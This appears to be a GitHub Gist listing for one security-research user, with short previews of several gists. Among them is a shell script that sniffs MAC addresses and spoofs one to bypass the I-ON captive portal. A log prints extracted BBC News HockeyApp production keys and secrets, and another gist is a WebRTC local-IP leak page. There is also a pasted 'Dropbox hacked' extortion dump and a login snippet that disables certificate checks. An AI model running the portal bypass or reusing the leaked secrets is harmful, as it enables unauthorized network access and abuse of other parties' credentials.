Piyush Raj 0x48piraj
0x48piraj
/ 2010.txt
Created
March 17, 2020 09:49
Visualization of Indian Institutes of Technology (IITs) MCQ Question Paper Answers (https://medium.com/manipal/jee-mains-analysis-d89387d3a180)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 1-1 | |
| 2-2 | |
| 3-2 | |
| 4-3 | |
| 5-4 | |
| 6-1 | |
| 7-2 | |
| 8-3 | |
| 9-2 | |
| 10-3 |
0x48piraj
/ MUJ-DMSAuth.py
Last active
March 17, 2020 09:41
Manipal University Jaipur DMS Session Authentication Snippet
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| from requests.packages.urllib3.exceptions import InsecureRequestWarning | |
| requests.packages.urllib3.disable_warnings(InsecureRequestWarning) | |
| payload = { 'txtUserid': 'studentReg', 'txtpassword': 'studentPassword' } | |
| url = 'https://dms.jaipur.manipal.edu/loginForm.aspx' | |
| requests.Session().post(url, data=payload, verify=False).cookies.get_dict() |
0x48piraj
/ GizmodoJournalists.py
Created
March 8, 2020 14:23
Extracting Gizmodo journalists in #cybersecurity
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # https://gizmodo.com/tag/cybersecurity?startIndex=20 | |
| import requests | |
| import re | |
| lst=[] | |
| for qr in range(20,481,20): # 480 | |
| r = requests.get("https://gizmodo.com/tag/cybersecurity?startIndex=" + str(qr)) | |
| for i in list(set(re.findall(r'(?<=kinja.com/)[^"]*', str(r.content)))): | |
| if ""," in i: |
0x48piraj
/ bcd-verify.py
Created
December 20, 2019 09:57
Binary Coded Decimal or BCD Numbering System Algorithm Verification
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # from 'observation' | |
| zton = ['0000','0001', '0010', '0011', '0100', '0101', '0110', '0111', '1000', '1001'] | |
| def bcd(n1, n2): | |
| num = str(n1 + n2) | |
| answer = "".join([zton[int(i)] for i in num]) # bcd answer | |
| c = bin(int(n1) + int(n2))[2:].zfill(4) # bin(int(n1) + int(n2)).replace("0b","") does not formats to 4 bit binary | |
| if answer == c : | |
| print('Passed') |
0x48piraj
/ output.log
Created
November 30, 2019 16:10
Output from one of my unpublished tools which extracts API keys from Android apps.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| --- BBC NEWS --- | |
| <string name="hockeyapp_arabic_production_secret">uEmvLI7ISged1bGkPLrqeQ</string> | |
| <string name="hockeyapp_cymru_production_key">s29lhGbwTRuwFObpBkfv1Q</string> | |
| <string name="hockeyapp_cymru_production_secret">9ELcUn_aRx6XloRKmixKww</string> | |
| <string name="hockeyapp_gnl_production_key">5uxVka7XShWhgxXRDEOX-w</string> |
0x48piraj
/ DropboxCredsLeak.txt
Created
November 5, 2019 12:23
Recovered deleted dump of Dropbox credentials during my research on tracking malware campaigns. Initial dump was uploaded over (https://pastebin.com/teija5qQ)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ***** DROPBOX HACKED ***** | |
| 6,937,081 DROPBOX ACCOUNTS HACKED | |
| PHOTOS - VIDEOS - OTHER FILES | |
| MORE BITCOIN = MORE ACCOUNTS PUBLISHED ON PASTEBIN | |
| As more BTC is donated , More pastebin pastes will appear | |
| To find them, simply search for "DROPBOX HACKED" and you | |
| will see any additional pastes as they are published. | |
0x48piraj
/ phiship.html
Created
August 18, 2019 19:05
Phishing local IP address on-the-fly via javascript
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!doctype html> | |
| <html><head> | |
| <meta charset="utf-8"> | |
| <title>Network IP Address</title> | |
| </head><body> | |
| Your local IP is: <h1 id=list>-</h1> | |
| <script> | |
| var RTCPeerConnection = window.webkitRTCPeerConnection || window.mozRTCPeerConnection; | |
| if (RTCPeerConnection) (function () { | |
| var rtc = new RTCPeerConnection({iceServers:[]}); |
0x48piraj
/ i-ONexploit.sh
Last active
August 24, 2019 09:01
Shell script to exploit vulnerable I-ON Captive Portal which depends on MAC addresses for identification. (https://wifilogin.myion.in)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/sh | |
| echo "Capturing various MAC addr(s) from local network for ~1 minute ...\n" | |
| wlan=`iw dev | awk '$1=="Interface"{print $2}'` | |
| tshark -a duration:100 -i $wlan -T fields -e eth.src | sort | uniq | |
| printf "\nEnter target MAC addr : " | |
| read mac | |
| ifconfig $wlan down | |
| macchanger -m $mac $wlan | |
| ifconfig $wlan up |
0x48piraj
/ I-ONHTTPRequest.log
Created
August 15, 2019 19:07
Vulnerable HTTP Request made by I-ON Captive Portal (https://wifilogin.myion.in)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| GET /?login=1&mac=B2_Hostel&page=status&link-login-only=http://10.163.0.1/login&link-logout=http://10.163.0.1/logout&uname=MM:MM:MM:SS:SS:SS&mac=B2_Hostel&interface-name=B2_Hostel HTTP/1.1 | |
| Host: wifilogin.myion.in | |
| Connection: close | |
| Upgrade-Insecure-Requests: 1 | |
| User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36 | |
| Sec-Fetch-Mode: navigate | |
| Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 | |
| Sec-Fetch-Site: cross-site | |
| Referer: http://10.163.0.1/status | |
| Accept-Encoding: gzip, deflate |
0x48piraj
/ LoginDump.html
Created
August 14, 2019 15:45
Output of $ curl -s http://10.163.0.1/login
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <head> | |
| <title>mikrotik hotspot > novirzit</title> | |
| <!-- <meta http-equiv="refresh" content="2; url=http://10.163.0.1/status"> --> | |
| <meta http-equiv="Content-Type" content="text/html; charset=windows-1257"> | |
| <meta http-equiv="pragma" content="no-cache"> | |
| <meta http-equiv="expires" content="-1"> | |
| <style type="text/css"> | |
| <!-- | |
| textarea,input,select { |